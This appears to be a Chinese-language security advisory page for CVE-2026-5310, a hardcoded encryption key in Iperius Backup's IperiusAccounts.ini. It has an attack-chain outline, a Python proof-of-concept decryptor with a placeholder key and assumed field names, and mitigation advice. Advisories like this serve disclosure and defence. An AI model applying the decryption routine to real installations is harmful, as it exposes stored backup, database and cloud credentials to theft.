CVE-2026-5310 CVSS 2.5 低危

CVE-2026-5310 Iperius Backup硬编码密钥漏洞

披露日期: 2026-04-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5310

漏洞类型

硬编码加密密钥

CVSS评分

2.5 低危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Enter Software Iperius Backup

漏洞概述

Enter Software Iperius Backup在8.7.2及之前的版本中存在安全漏洞。该漏洞源于文件`IperiusAccounts.ini`中使用了硬编码的加密密钥。攻击者可以利用此密钥解密敏感信息。此漏洞需要本地访问权限且利用难度较高，建议用户尽快升级至8.7.4版本以修复问题。

技术细节

该漏洞的核心问题在于Iperius Backup软件对敏感数据的加密保护机制存在设计缺陷。在受影响版本（8.7.2及以下）中，软件用于加密存储在`IperiusAccounts.ini`文件中的账户凭证的密钥被硬编码在程序二进制文件或配置逻辑中。由于密钥并非由用户动态生成或通过安全存储机制保护，任何能够访问该文件的本地攻击者（即使是低权限账户）都可以通过逆向工程或查阅公开的漏洞分析获取该硬编码密钥。利用该密钥，攻击者可以解密配置文件，从而窃取备份任务所涉及的数据库、云存储或FTP账户的敏感凭据。尽管CVSS评分较低（2.5）且攻击复杂度较高，但这直接威胁到了备份数据的机密性，可能导致横向移动或数据泄露。

攻击链分析

STEP 1

Reconnaissance

攻击者确认目标系统运行的是Enter Software Iperius Backup 8.7.2或更低版本。

STEP 2

Local Access

攻击者获得目标系统的本地访问权限，即使是低权限账户（PR:L）。

STEP 3

File Access

攻击者定位并读取包含敏感信息的配置文件`IperiusAccounts.ini`。

STEP 4

Key Extraction

攻击者利用公开信息或逆向分析工具从软件中提取硬编码的加密密钥。

STEP 5

Decryption

使用提取的密钥解密配置文件中的账户凭据，获取明文密码或敏感Token。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-5310
# Hardcoded Cryptographic Key Usage in Iperius Backup

import base64
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import configparser

# The hardcoded key extracted from the vulnerable binary
# In a real scenario, this would be derived from reversing the specific version
HARDCODED_KEY = b'IPERIUS_BACKUP_KEY_...' 
IV = b'INIT_VECTOR_16BY' 

def decrypt_config(file_path):
    config = configparser.ConfigParser()
    config.read(file_path)
    
    # Assuming the encrypted data is stored in a specific section/key
    encrypted_data = config.get('Accounts', 'EncryptedPassword')
    
    try:
        # Decode base64 if needed
        enc_bytes = base64.b64decode(encrypted_data)
        
        # Create cipher object
        cipher = AES.new(HARDCODED_KEY, AES.MODE_CBC, IV)
        
        # Decrypt and unpad
        decrypted = unpad(cipher.decrypt(enc_bytes), AES.block_size)
        print(f"[+] Decrypted Password: {decrypted.decode('utf-8')}")
        
    except Exception as e:
        print(f"[-] Decryption failed: {e}")

if __name__ == "__main__":
    # Usage: python poc.py <path_to_IperiusAccounts.ini>
    import sys
    if len(sys.argv) > 1:
        decrypt_config(sys.argv[1])
    else:
        print("Please provide the path to IperiusAccounts.ini")

影响范围

Enter Software Iperius Backup <= 8.7.2

防御指南

临时缓解措施

在无法立即升级的情况下，应通过操作系统权限严格控制对Iperius Backup安装目录及配置文件的访问，仅允许特定管理员账户读取，防止低权限用户提取密钥和加密数据。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表